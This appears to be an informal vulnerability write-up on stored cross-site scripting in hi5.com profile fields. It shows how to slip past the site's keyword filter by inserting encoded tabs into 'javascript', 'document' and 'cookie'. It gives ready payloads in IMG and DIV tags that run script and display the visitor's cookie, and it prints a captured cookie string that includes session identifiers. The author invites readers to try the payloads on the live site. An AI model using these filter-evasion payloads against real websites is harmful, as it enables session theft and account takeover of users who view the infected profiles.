hi5.com

Homepage:
http://www.hi5.com

Affected files:

Input boxes of editing your profile.

XSS Vuln with cookie disclosure:

It seems hi5.com allows alot of html tags to be used on thier site but they will filter out words like javascript, applet, and iframe tags (which is to be expected). Heres a link to the page that lists allthe tags they will and won't allow:

http://hi5.com/friend/account/html_tips.html

How do we get around this? Well, to get around the javascript filtering we use An embedded encoded tab to break up the javascript word. Below are a few examples of it. For PoC try putting this in your profile. (I used the Hometown box, all should work tho) :

<IMG SRC="jav&#x09;ascript:alert('XSS');">

or

<DIV STYLE="background-image: url(jav&#x09;ascript:al&#x09;ert('XSS'))">

Why do we have to use an embedded encoded tab in the word "alert" in a div tag and not a img tag? I have no idea! 

Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg

WHERES THE COOKIE?!?!

Now lets change that so we can show our cookie data. Since they don't seem to allow thewords document and cookie, 

lets use the same method above to break it up. Try putting:

Popup alert:
<IMG SRC="jav&#x09;ascript:alert(docu&#x09;ment.coo&#x09;kie);">

Write on screen:
<IMG SRC="jav&#x09;ascript:docu&#x09;ment.write(docu&#x09;ment.cookie);">

Our Cookie:
hi5banner_traffic_US; hi5medium_traffic_US; hi5sky_traffic_US; hi5uniqueAd2=1; hi5adcomRect; hi5adcomSky; hi5inpath=-1;hi5sp=homepage;hi5loggedIn=true;adHistoryLdr=4:1150268890485:4:1150268897936:1:1150269052890:1:1150269092966:8:1150269130139:9:1150269256989:9:1150269310562:10:1150269315812:11:1150269416327:11:1150269438591:12:1150269446349:13:1150269502289:13:1150269518708:14:1150269567146:15:1150269654968; sc=Fics:0:Ficb:0:Ficl:0; JSESSIONID=a229uu7JgBN7; K-JSESSIONID0x9882f778=6821EBA8AA2FB03B1F4D6B04A2799FED;adHistoryRct=1001:1150268898713:1001:1150269130834:1004:1150269316178:1004:1150269447018:1002:1150269519194:1002:1150269669974:1008:1150269721357:1007:1150269799646:1007:1150269971317:1010:1150270159468:1011:1150270778028:1011:1150270823873:1012:1150270950243;adHistorySky=2004:1150269046423:2004:1150269086714:2001:1150269250710:2001:1150269303450:2008:1150269409727:2007:1150269432295:2007:1150269495667:2020:1150269560927:2002:1150269648476:2002:1150269691452:2012:115
 0269709420:2011:1150269751737:2011:1150269785251:2014:1150270053753:2015:1150270141733



Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg